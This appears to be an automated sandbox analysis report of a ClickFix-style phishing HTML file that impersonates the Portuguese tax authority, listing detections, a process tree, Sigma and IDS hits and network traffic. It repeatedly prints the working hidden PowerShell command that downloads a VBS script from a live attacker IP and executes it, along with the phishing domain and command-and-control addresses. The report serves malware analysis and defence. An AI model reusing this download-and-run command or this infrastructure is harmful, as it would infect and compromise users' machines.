Edit tour

Windows Analysis Report
COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html

Overview

General Information

Sample name:	COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html renamed because original name is a hash value
Original sample name:	COMPROVATIVO-14996813-MARO-ANCZ0-PD9BC - 208.html
Analysis ID:	1647285
MD5:	ba2bcaa77efc9b67d93f86fa57f0dece
SHA1:	df0e5daaf1dc984d1957ad10b0bf0bef988eac2c
SHA256:	3f1c14c8e70f80db59f481da869e19470f004de8c0e17751911ce06d01dacead
Infos:

Detection

CAPTCHA Scam ClickFix

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected CAPTCHA Scam ClickFix

AI detected suspicious Javascript

AI detected suspicious URL

HTML page adds supicious text to clipboard

Loading BitLocker PowerShell Module

Potential malicious VBS script found (has network functionality)

Potential malicious VBS script found (suspicious strings)

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: WScript or CScript Dropper - File

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Windows Shell Script Host drops VBS files

Abnormal high CPU Usage

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected suspicious crossdomain redirect

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 4232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1856,i,12380028377297029268,5033635301295998014,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2136 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6384 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html" MD5: E81F54E6C1129887AEA47E7D092680BF)

cmd.exe (PID: 6256 cmdline: cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6560 cmdline: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

wscript.exe (PID: 2732 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

svchost.exe (PID: 6736 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

wscript.exe (PID: 5744 cmdline: wscript.exe "C:\Users\user\AppData\Local\Temp\9772.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
1.3.pages.csv	JoeSecurity_CAPTCHAScam	Yara detected CAPTCHA Scam/ ClickFix	Joe Security
1.1.pages.csv	JoeSecurity_CAPTCHAScam	Yara detected CAPTCHA Scam/ ClickFix	Joe Security
1.2.pages.csv	JoeSecurity_CAPTCHAScam	Yara detected CAPTCHA Scam/ ClickFix	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6560, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , ProcessId: 2732, ProcessName: wscript.exe

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 3.128.172.139, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5744, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49729

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6560, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , ProcessId: 2732, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6560, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , ProcessId: 2732, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6560, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , ProcessId: 2732, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper - File

Source: File created

Author: Tim Shelton: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 2732, TargetFilename: C:\Users\user\AppData\Local\Temp\9772.vbs

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6560, TargetFilename: C:\Users\user\AppData\Local\Temp\5049.vbs

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, CommandLine: cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5604, ProcessCommandLine: cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, ProcessId: 6256, ProcessName: cmd.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 3.128.172.139, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5744, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49729

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, CommandLine: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6256, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, ProcessId: 6560, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, CommandLine: cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5604, ProcessCommandLine: cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, ProcessId: 6256, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6560, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs" , ProcessId: 2732, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, CommandLine: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6256, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx, ProcessId: 6560, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6736, ProcessName: svchost.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-24T17:33:09.285219+0100	2028371	3	Unknown Traffic	192.168.2.8	49730	3.5.129.15	443	TCP

ET MALWARE Clickfix Style Post-Infection CnC Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-24T17:30:40.535532+0100	2057788	1	Malware Command and Control Activity Detected	192.168.2.8	49713	3.133.160.140	80	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-24T17:30:40.535532+0100	1810000	2	Potentially Bad Traffic	192.168.2.8	49713	3.133.160.140	80	TCP
2025-03-24T17:30:41.152247+0100	1810000	2	Potentially Bad Traffic	192.168.2.8	49714	52.219.108.138	443	TCP

Joe Sandbox Signatures

• AV Detection
• Phishing
• Compliance
• Spreading
• Software Vulnerabilities
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://3.133.160.140	Avira URL Cloud: Label: malware
Source: http://3.133.160.140/349.php	Avira URL Cloud: Label: malware

Phishing

Yara detected CAPTCHA Scam ClickFix

Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 1.0..script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://autoridade-tributaria.com/MAR-FAT/Comprova... This script contains several high-risk indicators, including dynamic code execution through the use of `unescape()` and obfuscated code. It also appears to be attempting to collect sensitive user data and transmit it to external domains, which is a clear sign of malicious intent. The overall behavior and structure of the script strongly suggest it is a malicious phishing or data exfiltration attempt, warranting a high-risk score.

AI detected suspicious URL

Source: https://autoridade-tributaria.com

Joe Sandbox AI: The URL 'https://autoridade-tributaria.com' closely resembles the legitimate domain of the Portuguese tax authority, 'https://www.portaldasfinancas.gov.pt'. The use of 'autoridade-tributaria' directly references the Portuguese term for 'Tax Authority', which is a key component of the legitimate brand's identity. The '.com' extension is a common generic top-level domain, which could be used to mislead users into thinking it is an official site, especially since the legitimate site uses a '.gov.pt' extension, indicating a government entity. The similarity score is high due to the direct use of the brand's name and the potential for user confusion. The likelihood of typosquatting is also high, as the domain structure and name suggest an attempt to mimic the official tax authority's online presence.

Source: COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/COMPROVATIVO-14996813-MAR%23U00c7O-ANCZ0-PD9BC%20-%20208.html	HTTP Parser: No favicon
Source: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM541...	HTTP Parser: No favicon
Source: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM541...	HTTP Parser: No favicon
Source: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM541...	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 142.251.41.4:443 -> 192.168.2.8:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.60.162:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.219.108.138:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.129.15:443 -> 192.168.2.8:49730 version: TLS 1.2

Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
